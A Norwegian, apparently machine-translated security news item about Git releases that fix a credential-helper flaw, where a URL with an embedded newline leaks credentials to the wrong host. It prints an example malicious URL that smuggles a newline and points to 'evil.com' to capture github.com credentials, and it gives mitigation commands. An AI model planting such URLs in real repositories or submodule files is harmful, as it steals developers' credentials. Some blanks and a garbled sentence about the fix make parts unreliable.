korrigerende utgivelser av det distribuerte kildekontrollsystemet Git 2.26.1, 2.25.3, 2.24.2, 2.23.2, 2.22.3, 2.21.2, 2.20.3, 2.19.4, 2.18.3 og 2.17.4, i som eliminerte () i behandleren "", som fører til at legitimasjon sendes til feil vert når en git-klient får tilgang til et depot ved å bruke en spesielt formatert URL som inneholder et linjeskifttegn. Sårbarheten kan brukes til å sørge for at legitimasjon fra en annen vert sendes til en server kontrollert av angriperen.
Når du spesifiserer en URL som "https://evil.com?%0ahost=github.com/", vil legitimasjonsbehandleren når du kobler til verten evil.com, sende autentiseringsparameterne spesifisert for github.com. Problemet oppstår når du utfører operasjoner som "git clone", inkludert behandling av URL-er for undermoduler (for eksempel vil "git submodule update" automatisk behandle URL-ene spesifisert i .gitmodules-filen fra depotet). Sårbarheten er mest farlig i situasjoner der en utvikler kloner et depot uten å se URL-en, for eksempel når du arbeider med undermoduler, eller i systemer som utfører automatiske handlinger, for eksempel i pakkebygg-skript.
For å blokkere sårbarheter i nye versjoner sende et nylinjetegn i alle verdier som overføres gjennom legitimasjonsutvekslingsprotokollen. For distribusjoner kan du spore utgivelsen av pakkeoppdateringer på sidene , , , , , , .
Som en løsning for å blokkere problemet Ikke bruk credential.helper når du får tilgang til offentlige depoter og ikke bruk "git clone" i "--recurse-submodules"-modus med ukontrollerte repositories. For å fullstendig deaktivere credential.helper-behandleren, som gjør det og hente passord fra , beskyttet eller en fil med passord, kan du bruke kommandoene:
git config --unset credential.helper
git config --global --unset credential.helper
git config --system --unset credential.helper
Kilde: opennet.ru